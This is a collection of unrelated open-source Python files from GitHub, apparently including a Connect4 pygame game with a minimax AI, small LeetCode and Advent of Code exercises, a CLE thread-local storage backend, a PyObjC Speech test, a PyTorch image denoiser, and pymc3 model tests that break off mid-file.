pygame.QUIT: \r\n sys.exit()\r\n \r\n if event.type == pygame.MOUSEMOTION: #add animation of moving the piece\r\n pygame.draw.rect(board.screen, (0,0,0) , (0,0, board.width,board.SQUARESIZE)) #draw black rectangle to remove overlapping circles\r\n posx = event.pos[0]\r\n if turn == 0: #player 1 turn, draw red circle\r\n pygame.draw.circle(board.screen, (255,0,0), (posx, int(board.SQUARESIZE/2 )),int(board.SQUARESIZE/2 - 5))\r\n else: #player 2 turn, draw red circle\r\n pygame.draw.circle(board.screen, (255,255,0), (posx, int(board.SQUARESIZE/2 )),int(board.SQUARESIZE/2 - 5))\r\n pygame.display.update()\r\n\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN: #event where mouse clicked\r\n pygame.draw.rect(board.screen, (0,0,0) , (0,0, board.width,board.SQUARESIZE)) #draw black rectangle to remove overlapping circles\r\n #print(event.pos)\r\n # #Player 1 input\r\n if turn == 0:\r\n posx = event.pos[0] #access the x position of tuple\r\n userInput = int(math.floor(posx/board.SQUARESIZE)) #first column = 0 to 100, sec col = 100 to 200, etc. \r\n #userInput = input(\"Which column selected?: \")\r\n \r\n try:\r\n board.drop_piece(int(userInput),board.piece_one)\r\n board.print_board()\r\n board.draw_board()\r\n #check_winner = board.has_winner() #Might change this to check only the last inserted location instead of all the positions in board\r\n \r\n #prevRow = board.previous_row(int(userInput))\r\n check_winner = board.has_winner(piece= board.piece_one) #Need to check all possible locations. Cannot check just starting from the last inserted position\r\n #check_winner = board.check_piece(prevRow,int(userInput))\r\n \r\n if check_winner == True: #if current turn results in winning state, end. else continue\r\n game_over = True\r\n \r\n # #Get the winner at position check_winner[0],check_winner[1]\r\n # player_winner = board.get_winner(check_winner[0],check_winner[1])\r\n \r\n # print(\"Game Over. The winner is: \" + player_winner)\r\n \r\n #Leave it as player1, since anyway player2 makes a winning move this round, otherwise would have detected player1 before or earlier\r\n print(\"Game Over. The winner is: Player 1\")\r\n \r\n label = myfont.render(\"Player 1 Wins!\",1, (255,0,0)) #show on screen\r\n board.screen.blit(label, (40,10))\r\n pygame.display.update() #update to show changes\r\n pygame.time.wait(3000) #give 3 seconds before automatic close window\r\n \r\n else:\r\n turn = 1\r\n\r\n except IndexError:\r\n print(\"Try Again\")\r\n board.print_board()\r\n continue\r\n\r\n except Exception: #If didn't insert correctly\r\n print(\"Try Again\")\r\n board.print_board()\r\n continue\r\n\r\n \r\n #AI input\r\n if turn == 1:\r\n \r\n #AI input\r\n boardAI = Connect4AI(board) #Pass in the board to the AI to create the tree. \r\n \r\n #check next best location\r\n #userInput = boardAI.pick_best_move()\r\n\r\n #minimax algorithm\r\n userInput,value = boardAI.minimax(boardAI.tree.root,3,True)\r\n \r\n #userInput = int(math.floor(posx/board.SQUARESIZE)) #first column = 0 to 100, sec col = 100 to 200, etc. GUI user input\r\n #userInput = input(\"Which column selected?: \") #Manual input in console\r\n \r\n try:\r\n board.drop_piece(int(userInput),board.piece_two)\r\n board.print_board()\r\n board.draw_board()\r\n\r\n #check_winner = board.has_winner() #Might change this to check only the last inserted location instead of all the positions in board\r\n\r\n #prevRow = board.previous_row(int(userInput))\r\n check_winner = board.has_winner(piece = board.piece_two) #Need to check all possible locations. 
Cannot check just starting from the last inserted position\r\n #check_winner = board.check_piece(prevRow,int(userInput))\r\n\r\n if check_winner == True: #if current turn results in winning state, end. else continue\r\n game_over = True\r\n #Get the winner at position check_winner[0],check_winner[1]\r\n #player_winner = board.get_winner(check_winner[0],check_winner[1])\r\n\r\n #print(\"Game Over. The winner is: \" + player_winner) \r\n #Leave it as player2, since anyway player2 makes a winning move this round, otherwise would have detected player1 before or earlier\r\n print(\"Game Over. The winner is: Player 2\")\r\n\r\n label = myfont.render(\"Player 2 Wins!\",1, (255,255,0)) #show on screen\r\n board.screen.blit(label, (40,10))\r\n pygame.display.update() #update to show changes\r\n pygame.time.wait(3000) #give 3 seconds before automatic close window\r\n\r\n else:\r\n turn = 0\r\n \r\n except IndexError:\r\n print(\"Try Again\")\r\n board.print_board()\r\n continue\r\n\r\n except Exception: #If didn't insert correctly\r\n print(\"Try Again\")\r\n board.print_board()\r\n continue\r\n\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n \r\n\r\n\r\n\r\n ","repo_name":"GohNgeeJuay/Connect4AI","sub_path":"Connect4.py","file_name":"Connect4.py","file_ext":"py","file_size_in_byte":14740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29119733349","text":"#Question: easy\n#Given an array nums of integers, return how many of them contain an even number of digits.\nfrom typing import List\n\n\nclass Solution:\n def findNumbers(self, nums: List[int]) -> int:\n number_even = 0\n for number in nums:\n if number // 10:\n if number % 2 == 0:\n number_even += 1\n return number_even\n\n\nnums = [12, 345, 2, 6, 7896]\nresult = Solution()\nNumber_ofeven = result.findNumbers(nums)\nprint('Number of even number:', Number_ofeven)","repo_name":"kerncl/leetcode","sub_path":"python/easy/find_number_with_even_digits.py","file_name":"find_number_with_even_digits.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"27314415050","text":"from .. import Backend\nfrom ...memory import Clemory\nfrom ...errors import CLEError\n\nclass TLSObject(Backend):\n \"\"\"\n CLE implements thread-local storage by treating the TLS region as another object to be loaded. Because of the\n complex interactions between TLS and all the other objects that can be loaded into memory, each TLS object will\n perform some basic initialization when instantiated, and then once all other objects have been loaded,\n ``map_object()`` is called to actually put each object's image into memory.\n \"\"\"\n def __init__(self, loader, max_modules=256):\n super(TLSObject, self).__init__('cle##tls', loader=loader)\n self.arch = self.loader.main_object.arch\n self.memory = Clemory(self.arch)\n self.modules = []\n self.pic = True\n self.next_module_id = 0\n self.tp_offset = 0\n self.max_modules = max_modules\n\n def register_object(self, obj):\n \"\"\"\n Assign some thread-local identifiers to the module (object). Do the heavy lifting in a subclass.\n \"\"\"\n if len(self.modules) >= self.max_modules:\n raise CLEError(\"Too many loaded modules for TLS to handle... file this as a bug\")\n obj.tls_module_id = self.next_module_id\n self.next_module_id += 1\n\n self.modules.append(obj)\n\n def map_object(self, obj):\n # Grab the init images and map them into memory\n data = obj.memory.load(obj.tls_data_start, obj.tls_data_size).ljust(obj.tls_block_size, b'\\0')\n self.memory.add_backer(self.tp_offset + obj.tls_block_offset, data)\n\n def rebase(self):\n # this isn't the dependency of anything so we need to run our relocations ourselves\n for reloc in self.relocs:\n reloc.relocate()\n\nclass InternalTLSRelocation(object):\n def __init__(self, val, offset, owner):\n self.val = val\n self.offset = offset\n self.owner = owner\n self.symbol = None\n\n def relocate(self):\n self.owner.memory.pack_word(self.offset, self.val + self.owner.mapped_base)\n\nfrom .elf_tls import ELFTLSObject\nfrom .pe_tls import PETLSObject\n","repo_name":"stefanberg96/SMArTCAT","sub_path":"latestversion/lib/python3.7/site-packages/cle/backends/tls/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"69"}
+{"seq_id":"72300518940","text":"import rumps\nfrom CheckFilesFrame import DocFree, Create\nfrom multiprocessing import Process\nimport tkinter.ttk as ttk\nfrom tkinter import *\nfrom tkinter import filedialog\nfrom InspectionRealTime import CheckDocument\n\nclass AwesomeStatusBarApp(rumps.App):\n\n def create(self):\n Create()\n\n @rumps.clicked(\"설명\")\n def prefs(self, _):\n rumps.alert(\"jk! no preferences available!\")\n\n @rumps.clicked(\"옵션\")\n def onoff(self, sender):\n sender.state = not sender.state\n \n @rumps.clicked(\"파일 검사\")\n def Diagnose(self, _):\n th3 = Process(target=Create)\n th3.start()\n th3.join()\n\n @rumps.timer(3)\n def NowPrice(self, _):\n A = CheckDocument()\n if A != None:\n print(A)\n rumps.notification(\"경고\", \"문서감지\", f\"{A}, 경로에서 문서가 감지되었습니다\")\n\nif __name__ == \"__main__\":\n AwesomeStatusBarApp(\"Awesome App\").run()\n","repo_name":"cothi/vaccine","sub_path":"MacOS/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"25039506379","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport yaml\nimport zipfile as zf\n\n\ndef get_root_path():\n ROOT_DIR = 'dashboard_sample'\n return re.sub(f'{ROOT_DIR}.*', ROOT_DIR, os.path.abspath('.'))\n\n\ndef get_paths():\n root_path = get_root_path()\n with open(f'{root_path}/src/path.yaml', 'r') as f:\n path_dict = yaml.safe_load(f)\n\n for key in path_dict:\n path = path_dict[key]\n path_dict[key] = f'{root_path}/{path}'\n return path_dict\n\n\ndef unzip(fname, output_path):\n with zf.ZipFile(fname) as z:\n z.extractall(output_path)\n","repo_name":"t-akaike/dashboard_sample","sub_path":"src/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"1875060842","text":"import Speech\nfrom PyObjCTools.TestSupport import TestCase, min_os_level, min_sdk_level\nimport objc\n\n\nclass TestSFSpeechRecognizerHelper(Speech.NSObject):\n def speechRecognizer_availabilityDidChange_(self, a, b):\n pass\n\n\nclass TestSFSpeechRecognizer(TestCase):\n def test_enum_types(self):\n self.assertIsEnumType(Speech.SFSpeechRecognizerAuthorizationStatus)\n\n def test_constants(self):\n self.assertEqual(Speech.SFSpeechRecognizerAuthorizationStatusNotDetermined, 0)\n self.assertEqual(Speech.SFSpeechRecognizerAuthorizationStatusDenied, 1)\n self.assertEqual(Speech.SFSpeechRecognizerAuthorizationStatusRestricted, 2)\n self.assertEqual(Speech.SFSpeechRecognizerAuthorizationStatusAuthorized, 3)\n\n @min_sdk_level(\"10.15\")\n def test_protocols(self):\n self.assertProtocolExists(\"SFSpeechRecognizerDelegate\")\n\n def test_methods(self):\n self.assertArgIsBOOL(\n TestSFSpeechRecognizerHelper.speechRecognizer_availabilityDidChange_, 1\n )\n\n @min_os_level(\"10.15\")\n def test_methods10_15(self):\n self.assertArgIsBlock(\n Speech.SFSpeechRecognizer.requestAuthorization_, 0, b\"v\" + objc._C_NSInteger\n )\n\n self.assertResultIsBOOL(Speech.SFSpeechRecognizer.isAvailable)\n\n self.assertArgIsBlock(\n Speech.SFSpeechRecognizer.recognitionTaskWithRequest_resultHandler_,\n 1,\n b\"v@@\",\n )\n","repo_name":"ronaldoussoren/pyobjc","sub_path":"pyobjc-framework-Speech/PyObjCTest/test_sfspeechrecognizer.py","file_name":"test_sfspeechrecognizer.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":439,"dataset":"github-code","pt":"69"}
+{"seq_id":"40565677849","text":"#!/usr/bin/python3\n# -*- encoding: utf-8 -*-\n\nimport time, datetime\nimport RPi.GPIO as GPIO\n\nclass Stepper():\n\n def __init__(self):\n self.pinlist = [6,13,19]\n self.enpin = 6\n self.dirpin = 13\n self.steppin = 19\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n for x in self.pinlist:\n GPIO.setup(x,GPIO.OUT)\n for x in self.pinlist:\n GPIO.output(x,GPIO.LOW)\n\n def step(self, revs, rotation=0, speed=1):\n x = 0\n steps = revs*3200\n GPIO.output(self.enpin, GPIO.HIGH)\n if rotation == 0:\n GPIO.output(self.dirpin, GPIO.LOW)\n else: GPIO.output(self.dirpin, GPIO.HIGH)\n while x < steps:\n x += 1\n GPIO.output(self.steppin, GPIO.HIGH)\n time.sleep(.000001/speed)\n GPIO.output(self.steppin, GPIO.LOW)\n time.sleep(.000001/speed)\n GPIO.output(self.enpin, GPIO.LOW)\n\nif __name__==\"__main__\":\n step = Stepper()\n step.step(2,1,1)\n GPIO.cleanup()\n#140 steps 0 dir Station 1 to Station 2\n#140 steps 1 dir Station 2 to Station 1\n#271 steps 1 dir Station 3 to Station 1\n#131 steps 1 dir Station 3 to Station 2\n#268 steps 0 dir Station 1 to Station 3 then homing()\n#128 steps 0 dir Station 2 to Station 3 then homing()\n","repo_name":"gauthimd/AcidDipTest","sub_path":"motordriver.py","file_name":"motordriver.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5771940164","text":"#!/usr/bin/env python\n\n# Starter Code for New PA2\n# Based on code from August Soderberg\nimport rospy\n\nfrom geometry_msgs.msg import Twist\nfrom nav_msgs.msg import Odometry\nfrom sensor_msgs.msg import LaserScan\nimport numpy as np\n\ndef scan_cb(msg):\n global ranges\n ranges = np.array(msg.ranges)\n\ndef odom_cb(msg):\n global pose\n pose = msg.pose\n\n#Set up node and pubs/subs\n\nrospy.init_node('pilot')\nscan_sub = rospy.Subscriber('/scan', LaserScan, scan_cb)\nodom_sub = rospy.Subscriber('/odom', Odometry, odom_cb)\npub = rospy.Publisher('cmd_vel', Twist, queue_size = 1)\n\npose = None\nrate = rospy.Rate(2)\n\nstart_time = rospy.Time.now()\nwhile pose == None:\n print(\"Waiting for simulated robot\")\n\nstart_pose = pose\n\nwhile not rospy.is_shutdown():\n if rospy.Time.now() - start_time < rospy.Duration(secs=30):\n print(pose.pose.position.x)\n print(\">>>>>>>>>>> roomba is vaccuming\")\n else:\n print(\"<<<<<<<<<< roomba returns to start\")\n break\n rate.sleep()\n","repo_name":"campusrover/prrexamples","sub_path":"src/pa_starters/roomba_starter.py","file_name":"roomba_starter.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"29619191033","text":"import pandas as pd\n\ncdf = pd.read_csv('./data/Day6_cdf.csv', header = None, skip_blank_lines = False, sep = '\\r\\t')\ncdf = cdf[0].values\n\ncdf_total = set()\ncdf_count = 0\n\ntotal_sum = 0\n\nfor i in cdf:\n if not isinstance(i, str):\n total_sum += len(cdf_total)\n cdf_total = set()\n else:\n cdf_total.update(list(i))\n \ntotal_sum += len(cdf_total)\nprint(total_sum)\n\n###############################################\n#PART 2\n###############################################\ncdf_all_yes = set()\ncdf_temp = set()\ntotal_yes_sum = 0\nnewgroup = True\n\nfor i in cdf:\n if not isinstance(i, str):\n total_yes_sum += len(cdf_all_yes)\n cdf_all_yes = set()\n newgroup = True\n elif newgroup:\n cdf_all_yes.update(list(i))\n newgroup = False\n \n else:\n cdf_temp.update(list(i))\n cdf_all_yes = cdf_all_yes.intersection(cdf_temp)\n cdf_temp = set()\n \ntotal_yes_sum += len(cdf_all_yes)\nprint(total_yes_sum)\n","repo_name":"acalver/AoC2020","sub_path":"Day6.py","file_name":"Day6.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29688778517","text":"import random\n\na = []\nfor k in range(6):\n a.append(random.randint(0, 100))\n# 利用random.randint(0, 100)生成一个0~100的20位随机数列\nprint(a)\n\n\ndef BinaryInsertSort(l):\n for i in range(1, len(l)): # i从1开始增加遍历,直到i temp:\n high = mid - 1\n else:\n low = mid + 1\n\n for j in range(i-1, high, -1): # 进行插入,插入位置是high+1\n l[j + 1] = l[j]\n l[high+1] = temp\n\n return l\n\n\nb = BinaryInsertSort(a)\nprint(b)\n","repo_name":"LW-YUNKAI/MyCode","sub_path":"Python/Algorithm/SortAlgorithm/BinaryInsertSort.py","file_name":"BinaryInsertSort.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"12093491277","text":"import os\nfrom contextlib import contextmanager\n\ndef test1(cd):\n before = os.getcwd()\n with cd('/'):\n inner = os.getcwd()\n after = os.getcwd()\n assert before == after != inner\n\n\ndef test2(cd):\n before = os.getcwd()\n try:\n with cd('/'):\n inner = os.getcwd()\n 1/0\n except ZeroDivisionError:\n error = os.getcwd()\n after = os.getcwd()\n assert before == after == error != inner\n\n\nclass cd:\n\n def __init__(self, path):\n self.path = path\n self.old = os.getcwd()\n\n def __enter__(self):\n os.chdir(self.path)\n\n def __exit__(self, exc_type, exc_value, traceback):\n os.chdir(self.old)\n\ntest1(cd)\ntest2(cd)\n\n\n@contextmanager\ndef cd(path):\n old = os.getcwd()\n os.chdir(path)\n try:\n yield\n finally:\n os.chdir(old)\n\ntest1(cd)\ntest2(cd)\n","repo_name":"huanghao/learning-python","sub_path":"chapter07/cd.py","file_name":"cd.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"72262423261","text":"# Python Version: 3.9.1\n# Author: Lyman McBride\n#\n# Purpose: Student Tracking System. Similar to the phonebook project,\n# but self produced. Requirements are outlined, but \n# no code is provided.\n\nimport tkinter as tk\nfrom tkinter import *\nimport functions\nimport gui\n\nclass ParentWindow(Frame):\n def __init__(self, master, *args, **kwargs):\n Frame.__init__(self, master, *args,**kwargs)\n\n self.master = master\n self.master.minsize(500,370)\n functions.center_window(self,500,370)\n self.master.title(\"Student Tracking\")\n self.master.configure(bg='#99e6ff')\n self.master.protocol(\"WM_DELETE_WINDOW\", lambda: functions.ask_quit(self))\n\n gui.load_gui(self)\n\nif __name__ == \"__main__\":\n root=tk.Tk()\n App = ParentWindow(root)\n root.mainloop()","repo_name":"lymanmcbride/tech-academy-python-projects","sub_path":"Student_Tracking_System/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12646883515","text":"def get_unique_items_in_first_compartment(bag):\n items_in_first_compartment = []\n print(bag)\n print(len(bag))\n print(range(int(len(bag) / 2)))\n for l in range(int(len(bag) / 2)):\n items_in_first_compartment += bag[l]\n #sample_set = set(sample_list)\n unique_items_in_first_compartment = set(items_in_first_compartment)\n return unique_items_in_first_compartment\n\ndef get_unique_items_in_second_compartment(bag):\n items_in_second_compartment = []\n l = int(len(bag) / 2)\n while l < len(bag) - 1:\n items_in_second_compartment += bag[l]\n l += 1\n #sample_set = set(sample_list)\n unique_items_in_second_compartment = set(items_in_second_compartment)\n return unique_items_in_second_compartment\n\ndef to_priorities(set_):\n answer = []\n for l in set_:\n #print('to_p\\n' + str(ord(l)))\n l_asci = ord(l)\n if l_asci < 91: #Upper case. A is 65 and should be 27.\n l_asci -= (65-27)\n else: #lower case. a is 97 and should be 1\n l_asci -= (97-1)\n answer.append(l_asci)\n return answer\n\nFile_object = open(\"input\", \"r\")\nfile = File_object.readlines() #['GwrhJPDJCZFRcwfZWV\\n', 'LjnQlqNpjjmpmQlLlqNfZRvQcTWcTSTTZcSQcZ\\n',\nprint(file)\n\nlist_of_items_in_both_compartments_in_a_bag = [] #always only one\nfor i in file: #aJrwpWtwJgWrhcsFMMfFFhFp\n found = False\n unique_items_in_first_compartment = get_unique_items_in_first_compartment(i)\n unique_items_in_second_compartment = get_unique_items_in_second_compartment(i)\n for j in unique_items_in_first_compartment:\n for k in unique_items_in_second_compartment:\n if j == k:\n list_of_items_in_both_compartments_in_a_bag.append(j)\n found = True\n break\n if found:\n break\nlist_of_items_in_both_compartments_in_a_bag_s_priorities = to_priorities(list_of_items_in_both_compartments_in_a_bag)\nprint(\"here:\")\nprint(list_of_items_in_both_compartments_in_a_bag)\nprint(list_of_items_in_both_compartments_in_a_bag_s_priorities)\ntest_list = [2, 4]\nprint(sum(list_of_items_in_both_compartments_in_a_bag_s_priorities))\n# 157 too low\n\n\n\n","repo_name":"TailsTyler/calculator-challenge","sub_path":"Advent-of-code-2/3/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37542975960","text":"# =============================================================================\n# coded by https://github.com/Whiax/\n# - citation is required if you reuse large parts of this code\n# =============================================================================\nfrom torchvision.transforms import Normalize\nfrom torch.utils.data import Dataset\nimport matplotlib.pyplot as plt\nfrom os.path import join\nimport torch.nn as nn\nimport numpy as np\nimport torch\nimport pickle\nimport math\nimport datetime\n\n# =============================================================================\n# Dataset\n# =============================================================================\n# ImageNet \nclass ImageNoiseDataset(Dataset):\n def __init__(self, imgs, transforms):\n self.imgs = imgs\n self.transforms = transforms\n \n def __len__(self): return len(self.imgs)\n \n def __getitem__(self, idx):\n dataset=self\n item = {}\n image = dataset.imgs[idx] / 255\n image = dataset.transforms(image)\n noise = torch.rand(image.shape)\n item['image'] = image\n item['noise'] = noise\n return item\n\n# =============================================================================\n# Model\n# =============================================================================\n# https://arxiv.org/abs/1910.03151 / https://github.com/BangguWu/ECANet\nclass EcaModule(nn.Module):\n def __init__(self, channels=None, kernel_size=3, gamma=2, beta=1):\n super(EcaModule, self).__init__()\n assert kernel_size % 2 == 1\n if channels is not None:\n t = int(abs(math.log(channels, 2) + beta) / gamma)\n kernel_size = max(t if t % 2 else t + 1, 3)\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.conv = nn.Conv1d(1, 1, kernel_size=kernel_size, padding=(kernel_size - 1) // 2, bias=False)\n def forward(self, x):\n y = self.avg_pool(x)\n y = y.view(x.shape[0], 1, -1)\n y = self.conv(y)\n y = y.view(x.shape[0], -1, 1, 1).sigmoid()\n return x * y.expand_as(x)\n#whiax\ndef Conv2d(*args, **kwargs):\n args = [int(a) if type(a) != tuple else a for i,a in enumerate(args) if i < 6]\n if not 'padding' in kwargs:\n k = args[2] if len(args) > 2 else (kwargs['kernel_size'] if 'kernel_size' in kwargs else kwargs['k'])\n k = (k,k) if type(k) != tuple else k\n pad = ((k[0] - 1) // 2,(k[1] - 1) // 2)\n kwargs['padding'] = pad\n return nn.Conv2d(*args, **kwargs, **{'padding_mode':'zeros'})\nclass convolution(nn.Module):\n def __init__(self, inp_dim, out_dim, k=3, stride=1, groups=1, bn=True, act=True, dilation=1, bias=True, **kwargs):\n super(convolution, self).__init__()\n self.conv = Conv2d(inp_dim, out_dim, k, stride=(stride, stride), bias=not bn and bias, groups=groups, dilation=dilation, **kwargs)\n self.bn = nn.BatchNorm2d(out_dim) if bn else nn.Identity()\n self.activation = nn.ReLU(True) if act else nn.Identity()\n def forward(self, x):\n out = self.conv(x)\n out = self.bn(out)\n out = self.activation(out)\n return out\nclass convolution_att(convolution):\n def __init__(self, inp_dim, out_dim, k=3, stride=1, groups=1, bn=True, act=True, dilation=1, attention='eca'):\n super(convolution_att, self).__init__(inp_dim, out_dim, k, stride, groups, bn, act, dilation)\n self.attention = EcaModule(out_dim)\n def forward(self, x):\n out = super().forward(x)\n out = self.attention(out)\n return out\n\n\n#denoiser / whiax\nclass DenoiserModel(nn.Module):\n def __init__(self, f=44, depth_start_mult=2, depth_mult=2, depth=3, downsample2in1=[1], layconv=convolution_att):\n super().__init__()\n model=self\n \n fs = [f] \n curmult = 
depth_start_mult\n for i in range(1, depth+1):\n fs += [f*int(curmult)]\n curmult *= depth_mult\n model.upsample = nn.Upsample(scale_factor=2)\n \n #head\n model.layer_base = nn.Sequential(*[layconv(3, f, 3, 1)])\n #down\n model.layers_downsample = nn.ModuleList()\n for i in range(1, depth+1):\n if not i in downsample2in1:\n model.layers_downsample += [nn.Sequential(*[\n layconv(fs[i-1], fs[i], 3, 1),\n layconv(fs[i], fs[i], 3, 2) ])]\n else:\n model.layers_downsample += [nn.Sequential(*[\n layconv(fs[i-1], fs[i], 3, 2) ])]\n #att\n model.fcatt = nn.Sequential(*[\n nn.Linear(fs[-1], fs[-1]),\n nn.Sigmoid()])\n #up\n model.layers_upsample = nn.ModuleList()\n for _i in range(0, depth):\n i = -_i-1\n l = nn.ModuleList()\n l += [layconv(fs[i], fs[i], 3, 1)]\n l += [layconv(fs[i], fs[i-1], 1, 1)]\n model.layers_upsample += [l]\n model.layer_tail = nn.Sequential(*[layconv(f, 8, 3, 1), convolution_att(8, 3, 1, 1, bn=False, act=False)])\n # initialize_weights(self)\n \n #forward mod\n def forward(self, x):\n model=self\n if len(x.shape) == 3: x=x.view([1,*x.shape])\n base_x = x = model.layer_base(x)\n xdi0 = []\n for lay in model.layers_downsample:\n x = lay(x)\n xdi0 += [x]\n x = xdi0[-1] * model.fcatt(xdi0[-1].mean([2,3])).view([xdi0[-1].shape[0], xdi0[-1].shape[1], 1, 1])\n for i, lays in enumerate(model.layers_upsample):\n x = xdi0[-(i+1)] + lays[0](x)\n x = lays[1](x)\n x = model.upsample(x)\n x = base_x + x\n x = model.layer_tail(x)\n x = x.clip(0,1)\n return x\n\n# =============================================================================\n# Methods\n# =============================================================================\n#pytorch channel first to np channel last\ndef pt_to_np(tensor):\n return np.ascontiguousarray(tensor.permute(1,2,0).numpy())\n \n#load object\ndef load_object(name, folder='.'):\n return pickle.load(open(join(folder, name + '.pickle'), 'rb'))\n\n#show pt tensor\ndef plt_imshow_pt(t):\n if 'cuda' in str(t.device):\n plt.imshow(pt_to_np(t.cpu()).astype(np.uint8))\n else:\n plt.imshow(pt_to_np(t).astype(np.uint8))\n\n#dict to plot\ndef plot_dict(d, l='', source=None, **kwargs):\n if source is None: source = plt\n if l != '':\n source.plot(d.keys(), d.values(), label=l, **kwargs)\n source.legend(loc=\"upper left\")\n else:\n source.plot(d.keys(), d.values(), **kwargs)\n\n#get batch\ndef get_batch(loader, loader_iter):\n try:\n batch = next(loader_iter)\n except StopIteration:\n loader_iter = iter(loader)\n batch = next(loader_iter)\n return batch, loader_iter\n\n#normalize img tensor\nnormalize_t = Normalize((0.4814, 0.4578, 0.4082), (0.2686, 0.2613, 0.2757))\n\n# Return a dated id for a file/folder\ndef get_id():\n date = datetime.datetime.now()\n return f'{date.year}_{date.month:02}_{date.day:02}_{date.hour:02}_{date.minute:02}_{date.second:02}'\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Whiax/denoising-image-generator","sub_path":"methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":7084,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"32954790975","text":"import pytest\nfrom theano import theano, tensor as tt\n\nimport pymc3 as pm\nfrom pymc3.distributions import HalfCauchy, Normal, transforms\nfrom pymc3 import Potential, Deterministic\n\n\nclass NewModel(pm.Model):\n def __init__(self, name='', model=None):\n super(NewModel, self).__init__(name, model)\n assert pm.modelcontext(None) is self\n # 1) init variables with Var method\n self.Var('v1', pm.Normal.dist())\n self.v2 = pm.Normal('v2', mu=0, sd=1)\n # 2) Potentials and Deterministic variables with method too\n # be sure that names will not overlap with other same models\n pm.Deterministic('d', tt.constant(1))\n pm.Potential('p', tt.constant(1))\n\n\nclass DocstringModel(pm.Model):\n def __init__(self, mean=0, sd=1, name='', model=None):\n super(DocstringModel, self).__init__(name, model)\n self.Var('v1', Normal.dist(mu=mean, sd=sd))\n Normal('v2', mu=mean, sd=sd)\n Normal('v3', mu=mean, sd=HalfCauchy('sd', beta=10, testval=1.))\n Deterministic('v3_sq', self.v3 ** 2)\n Potential('p1', tt.constant(1))\n\n\nclass TestBaseModel(object):\n def test_setattr_properly_works(self):\n with pm.Model() as model:\n pm.Normal('v1')\n assert len(model.vars) == 1\n with pm.Model('sub') as submodel:\n submodel.Var('v1', pm.Normal.dist())\n assert hasattr(submodel, 'v1')\n assert len(submodel.vars) == 1\n assert len(model.vars) == 2\n with submodel:\n submodel.Var('v2', pm.Normal.dist())\n assert hasattr(submodel, 'v2')\n assert len(submodel.vars) == 2\n assert len(model.vars) == 3\n\n def test_context_passes_vars_to_parent_model(self):\n with pm.Model() as model:\n # a set of variables is created\n NewModel()\n # another set of variables are created but with prefix 'another'\n usermodel2 = NewModel(name='another')\n # you can enter in a context with submodel\n with usermodel2:\n usermodel2.Var('v3', pm.Normal.dist())\n pm.Normal('v4')\n # this variable is created in parent model too\n assert 'another_v2' in model.named_vars\n assert 'another_v3' in model.named_vars\n assert 'another_v3' in usermodel2.named_vars\n assert 'another_v4' in model.named_vars\n assert 'another_v4' in usermodel2.named_vars\n assert hasattr(usermodel2, 'v3')\n assert hasattr(usermodel2, 'v2')\n assert hasattr(usermodel2, 'v4')\n # When you create a class based model you should follow some rules\n with model:\n m = NewModel('one_more')\n assert m.d is model['one_more_d']\n assert m['d'] is model['one_more_d']\n assert m['one_more_d'] is model['one_more_d']\n\n\nclass TestNested(object):\n def test_nest_context_works(self):\n with pm.Model() as m:\n new = NewModel()\n with new:\n assert pm.modelcontext(None) is new\n assert pm.modelcontext(None) is m\n assert 'v1' in m.named_vars\n assert 'v2' in m.named_vars\n\n def test_named_context(self):\n with pm.Model() as m:\n NewModel(name='new')\n assert 'new_v1' in m.named_vars\n assert 'new_v2' in m.named_vars\n\n def test_docstring_example1(self):\n usage1 = DocstringModel()\n assert 'v1' in usage1.named_vars\n assert 'v2' in usage1.named_vars\n assert 'v3' in usage1.named_vars\n assert 'v3_sq' in usage1.named_vars\n assert len(usage1.potentials), 1\n\n def test_docstring_example2(self):\n with pm.Model() as model:\n DocstringModel(name='prefix')\n assert 'prefix_v1' in model.named_vars\n assert 'prefix_v2' in model.named_vars\n assert 'prefix_v3' in model.named_vars\n assert 'prefix_v3_sq' in model.named_vars\n assert len(model.potentials), 1\n\n def test_duplicates_detection(self):\n with pm.Model():\n DocstringModel(name='prefix')\n with 
